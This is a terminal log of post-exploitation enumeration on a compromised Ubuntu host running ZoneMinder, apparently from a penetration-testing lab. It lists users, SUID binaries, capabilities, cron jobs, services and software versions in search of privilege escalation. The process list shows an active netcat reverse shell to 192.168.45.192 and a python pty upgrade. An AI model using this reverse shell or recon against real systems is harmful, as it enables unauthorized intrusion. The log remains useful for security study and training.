System/Kernel
www-data@pebbles:/usr/share/zoneminder/www$ uname -a ; cat /etc/*release
Linux pebbles 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.6 LTS"
NAME="Ubuntu"
VERSION="16.04.6 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.6 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial4.4.0-21-genericx86_6416.04.6 LTS (Xenial Xerus)
Networks
www-data@pebbles:/usr/share/zoneminder/www$ ip route ; arp -a
default via 192.168.209.254 dev ens160 onlink
192.168.209.0/24 dev ens160 proto kernel scope link src 192.168.209.52
? (192.168.209.254) at 00:50:56:9e:b8:c6 [ether] on ens160www-data@pebbles:/usr/share/zoneminder/www$ netstat -antup4
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 297 192.168.209.52:43904 192.168.45.192:21 ESTABLISHED 2130/nc tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
Users & Groups
www-data@pebbles:/usr/share/zoneminder/www$ cat /etc/passwd ; ll /home
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
sally:x:1000:1000:Sally,,,:/home/sally:/bin/bash
mysql:x:111:117:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:112:119:ftp daemon,,,:/srv/ftp:/bin/false
total 12K
4.0K drwxr-xr-x 3 sally sally 4.0K Jun 24 2020 sally
4.0K drwxr-xr-x 23 root root 4.0K Jun 22 2020 ..
4.0K drwxr-xr-x 3 root root 4.0K Jun 22 2020 .sally
www-data@pebbles:/usr/share/zoneminder/www$ cut -d: -f1 /etc/passwd | xargs -n1 id
idt -d: -f1 /etc/passwd | xargs -n1
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(lxd) gid=65534(nogroup) groups=65534(nogroup)
uid=107(messagebus) gid=111(messagebus) groups=111(messagebus)
uid=108(uuidd) gid=112(uuidd) groups=112(uuidd)
uid=109(dnsmasq) gid=65534(nogroup) groups=65534(nogroup)
uid=110(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(sally) gid=1000(sally) groups=1000(sally),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
uid=111(mysql) gid=117(mysql) groups=117(mysql)
uid=112(ftp) gid=119(ftp) groups=119(ftp)uid=1000(sally) gid=1000(sally) groups=1000(sally),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
SUIDs
www-data@pebbles:/usr/share/zoneminder/www$ find / -perm -04000 -ls -type f 2>/dev/null
2579 40 -rwsr-xr-x 1 root root 39904 Mar 26 2019 /usr/bin/newgrp
5471 36 -rwsr-xr-x 1 root root 32944 Mar 26 2019 /usr/bin/newuidmap
14409 52 -rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at
2972 40 -rwsr-xr-x 1 root root 40432 Mar 26 2019 /usr/bin/chsh
2969 56 -rwsr-xr-x 1 root root 54256 Mar 26 2019 /usr/bin/passwd
6360 24 -rwsr-xr-x 1 root root 23376 Mar 27 2019 /usr/bin/pkexec
2110 136 -rwsr-xr-x 1 root root 136808 Jan 31 2020 /usr/bin/sudo
2968 72 -rwsr-xr-x 1 root root 71824 Mar 26 2019 /usr/bin/chfn
2970 76 -rwsr-xr-x 1 root root 75304 Mar 26 2019 /usr/bin/gpasswd
5469 36 -rwsr-xr-x 1 root root 32944 Mar 26 2019 /usr/bin/newgidmap
5564 108 -rwsr-sr-x 1 root root 106696 Nov 22 2019 /usr/lib/snapd/snap-confine
3025 44 -rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
5549 420 -rwsr-xr-x 1 root root 428240 Mar 4 2019 /usr/lib/openssh/ssh-keysign
5433 84 -rwsr-xr-x 1 root root 84120 Apr 9 2019 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
6356 16 -rwsr-xr-x 1 root root 14864 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
4060 12 -rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
262219 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
262220 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
262153 40 -rwsr-xr-x 1 root root 40128 Mar 26 2019 /bin/su
262199 28 -rwsr-xr-x 1 root root 27608 Jan 27 2020 /bin/umount
262169 40 -rwsr-xr-x 1 root root 40152 Jan 27 2020 /bin/mount
262555 32 -rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermountSGIDs
www-data@pebbles:/usr/share/zoneminder/www$ find / -type f -perm -02000 -ls 2>/dev/null
2920 36 -rwxr-sr-x 1 root shadow 35600 Apr 9 2018 /sbin/unix_chkpwd
2918 36 -rwxr-sr-x 1 root shadow 35632 Apr 9 2018 /sbin/pam_extrausers_chkpwd
5545 352 -rwxr-sr-x 1 root ssh 358624 Mar 4 2019 /usr/bin/ssh-agent
2967 64 -rwxr-sr-x 1 root shadow 62336 Mar 26 2019 /usr/bin/chage
14409 52 -rwsr-sr-x 1 daemon daemon 51464 Jan 14 2016 /usr/bin/at
14454 428 -rwxr-sr-x 1 root utmp 434216 Feb 7 2016 /usr/bin/screen
2971 24 -rwxr-sr-x 1 root shadow 22768 Mar 26 2019 /usr/bin/expiry
13316 16 -rwxr-sr-x 1 root tty 14752 Mar 1 2016 /usr/bin/bsd-write
174 36 -rwxr-sr-x 1 root crontab 36080 Apr 5 2016 /usr/bin/crontab
3692 28 -rwxr-sr-x 1 root tty 27368 Jan 27 2020 /usr/bin/wall
14080 40 -rwxr-sr-x 1 root mlocate 39520 Nov 18 2014 /usr/bin/mlocate
5564 108 -rwsr-sr-x 1 root root 106696 Nov 22 2019 /usr/lib/snapd/snap-confine
14450 12 -rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempterCapabilities
www-data@pebbles:/usr/share/zoneminder/www$ getcap -r / 2>/dev/null
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
/usr/bin/mtr = cap_net_raw+epProcesses
www-data@pebbles:/usr/share/zoneminder/www$ ps -auxwww
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.5 38040 6052 ? Ss 15:41 0:00 /sbin/init
root 514 0.0 0.2 28352 2732 ? Ss 15:41 0:00 /lib/systemd/systemd-journald
root 552 0.0 0.1 94772 1756 ? Ss 15:41 0:00 /sbin/lvmetad -f
root 557 0.0 0.4 45440 4916 ? Ss 15:41 0:00 /lib/systemd/systemd-udevd
root 622 0.0 1.0 194452 10284 ? Ssl 15:41 0:01 /usr/bin/vmtoolsd
systemd+ 659 0.0 0.2 100324 2400 ? Ssl 15:41 0:00 /lib/systemd/systemd-timesyncd
root 792 0.0 0.0 5220 148 ? Ss 15:41 0:00 /sbin/iscsid
root 793 0.0 0.3 5720 3516 ? S<Ls 15:41 0:00 /sbin/iscsid
daemon 1032 0.0 0.1 26044 1964 ? Ss 15:41 0:00 /usr/sbin/atd -f
root 1033 0.0 0.2 20228 2776 ? Ss 15:41 0:00 /lib/systemd/systemd-logind
root 1045 0.0 0.2 29008 2692 ? Ss 15:41 0:00 /usr/sbin/cron -f
root 1046 0.0 0.2 637276 2896 ? Ssl 15:41 0:00 /usr/bin/lxcfs /var/lib/lxcfs/
syslog 1063 0.0 0.5 256392 5156 ? Ssl 15:41 0:00 /usr/sbin/rsyslogd -n
root 1064 0.0 0.5 275860 5848 ? Ssl 15:41 0:00 /usr/lib/accountsservice/accounts-daemon
message+ 1066 0.0 0.3 42904 3648 ? Ss 15:41 0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root 1112 0.0 0.1 4396 1260 ? Ss 15:41 0:00 /usr/sbin/acpid
root 1113 0.0 0.8 85440 9016 ? Ss 15:41 0:00 /usr/bin/VGAuthService
root 1124 0.0 0.5 65512 5128 ? Ss 15:41 0:00 /usr/sbin/sshd -D
root 1127 0.0 0.2 24048 2304 ? Ss 15:41 0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root 1155 0.0 21.1 1154624 214836 ? Ssl 15:41 0:01 /usr/sbin/mysqld
root 1173 0.0 0.1 15936 1692 tty1 Ss+ 15:41 0:00 /sbin/agetty --noclear tty1 linux
root 1201 0.0 1.9 174624 19336 ? Ssl 15:41 0:00 /usr/bin/python3 /usr/share/unattended-upgrades/unattended-upgrade-shutdown --wait-for-signal
root 1203 0.0 0.5 277088 5964 ? Ssl 15:41 0:00 /usr/lib/policykit-1/polkitd --no-debug
root 1214 0.0 0.0 13372 160 ? Ss 15:41 0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
root 1287 0.0 2.4 271100 25216 ? Ss 15:41 0:00 /usr/sbin/apache2 -k start
www-data 1302 0.0 1.5 271692 15552 ? S 15:41 0:00 /usr/sbin/apache2 -k start
www-data 1304 0.0 1.5 271692 15428 ? S 15:41 0:00 /usr/sbin/apache2 -k start
www-data 1305 0.0 1.4 271572 14296 ? S 15:41 0:00 /usr/sbin/apache2 -k start
www-data 1306 0.0 1.4 271572 14296 ? S 15:41 0:00 /usr/sbin/apache2 -k start
www-data 1307 0.0 1.4 271688 14792 ? S 15:41 0:00 /usr/sbin/apache2 -k start
www-data 1376 0.0 1.4 84228 14912 ? S 15:41 0:01 /usr/bin/perl -wT /usr/bin/zmdc.pl startup
www-data 1403 0.0 2.9 102688 30096 ? S 15:41 0:00 /usr/bin/perl -wT /usr/bin/zmfilter.pl
www-data 1408 0.0 1.9 86412 19800 ? S 15:41 0:00 /usr/bin/perl -wT /usr/bin/zmaudit.pl -c
www-data 1437 0.0 1.7 82456 18076 ? S 15:41 0:00 /usr/bin/perl -wT /usr/bin/zmwatch.pl
www-data 2016 0.0 1.4 271744 14780 ? S 16:12 0:00 /usr/sbin/apache2 -k start
www-data 2041 0.0 1.4 271748 14816 ? S 16:23 0:00 /usr/sbin/apache2 -k start
www-data 2128 0.0 0.0 4504 700 ? S 16:50 0:00 sh -c mkfifo /tmp/datj; nc 192.168.45.192 21 0</tmp/datj | /bin/sh >/tmp/datj 2>&1; rm /tmp/datj
www-data 2130 0.0 0.1 11300 1776 ? S 16:50 0:00 nc 192.168.45.192 21
www-data 2131 0.0 0.0 4504 740 ? S 16:50 0:00 /bin/sh
www-data 2133 0.0 0.8 35836 8484 ? S 16:51 0:00 python3 -c import pty; pty.spawn("/bin/bash")
www-data 2134 0.0 0.2 18236 2976 pts/0 Ss 16:51 0:00 /bin/bash
www-data 2221 0.0 0.2 34424 2864 pts/0 R+ 16:54 0:00 ps -auxwwwroot 793 0.0 0.3 5720 3516 ? S<Ls 15:41 0:00 /sbin/iscsidroot 1045 0.0 0.2 29008 2692 ? Ss 15:41 0:00 /usr/sbin/cron -froot 1127 0.0 0.2 24048 2304 ? Ss 15:41 0:00 /usr/sbin/vsftpd /etc/vsftpd.confroot 1155 0.0 21.1 1154624 214836 ? Ssl 15:41 0:01 /usr/sbin/mysqldroot 1203 0.0 0.5 277088 5964 ? Ssl 15:41 0:00 /usr/lib/policykit-1/polkitd --no-debugroot 1214 0.0 0.0 13372 160 ? Ss 15:41 0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslogwww-data 1376 0.0 1.4 84228 14912 ? S 15:41 0:01 /usr/bin/perl -wT /usr/bin/zmdc.pl startup
Cron & Systemd
www-data@pebbles:/usr/share/zoneminder/www$ crontab -l ; cat /etc/crontab ; systemctl list-timers
no crontab for www-data
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
NEXT LEFT LAST PASSED
Tue 2025-03-11 22:01:51 EDT 5h 5min left Tue 2025-03-11 16:11:04 EDT 45min ago
Wed 2025-03-12 06:31:39 EDT 13h left Tue 2025-03-11 16:11:04 EDT 45min ago
Wed 2025-03-12 09:16:53 EDT 16h left Tue 2025-03-11 16:11:04 EDT 45min ago
Wed 2025-03-12 15:56:38 EDT 23h left Thu 2025-01-30 03:03:43 EST 1 months
4 timers listed.
Pass --all to see loaded but inactive timers, too.
lines 1-8/8 (END)Services
www-data@pebbles:/usr/share/zoneminder/www$ systemctl list-units --state=running
UNIT LOAD ACTIVE SUB DESCRIPTION
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable Fil
acpid.path loaded active running ACPI Events Check
init.scope loaded active running System and Service Manager
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active running ACPI event daemon
apache2.service loaded active running LSB: Apache2 web server
atd.service loaded active running Deferred execution scheduler
cron.service loaded active running Regular background program pr
dbus.service loaded active running D-Bus System Message Bus
getty@tty1.service loaded active running Getty on tty1
iscsid.service loaded active running iSCSI initiator daemon (iscsi
lvm2-lvmetad.service loaded active running LVM2 metadata daemon
lxcfs.service loaded active running FUSE filesystem for LXC
mdadm.service loaded active running LSB: MD monitoring daemon
mysql.service loaded active running MySQL Community Server
open-vm-tools.service loaded active running Service for virtual machines
polkitd.service loaded active running Authenticate and Authorize Us
rsyslog.service loaded active running System Logging Service
ssh.service loaded active running OpenBSD Secure Shell server
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-udevd.service loaded active running udev Kernel Device Manager
unattended-upgrades.service loaded active running Unattended Upgrades Shutdown
vgauth.service loaded active running Authentication service for vi
vsftpd.service loaded active running vsftpd FTP server
zoneminder.service loaded active running ZoneMinder CCTV recording and
acpid.socket loaded active running ACPID Listen Socket
dbus.socket loaded active running D-Bus System Message Bus Sock
lvm2-lvmetad.socket loaded active running LVM2 metadata daemon socket
syslog.socket loaded active running Syslog Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
LOAD = Reflects whether the unit definition was properly loaded.
ACTIVE = The high-level unit activation state, i.e. generalization of SUB.
SUB = The low-level unit activation state, values depend on unit type.
36 loaded units listed. Pass --all to see loaded but inactive units, too.
To show all installed unit files use 'systemctl list-unit-files'.apache2.serviceiscsid.servicemdadm.servicemysql.servicevsftpd.servicezoneminder.service
Sudo Version
www-data@pebbles:/usr/share/zoneminder/www$ sudo --version
Sudo version 1.8.16
Sudoers policy plugin version 1.8.16
Sudoers file grammar version 45
Sudoers I/O plugin version 1.8.16Sudo version 1.8.16
Glibc Version
www-data@pebbles:/usr/share/zoneminder/www$ ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23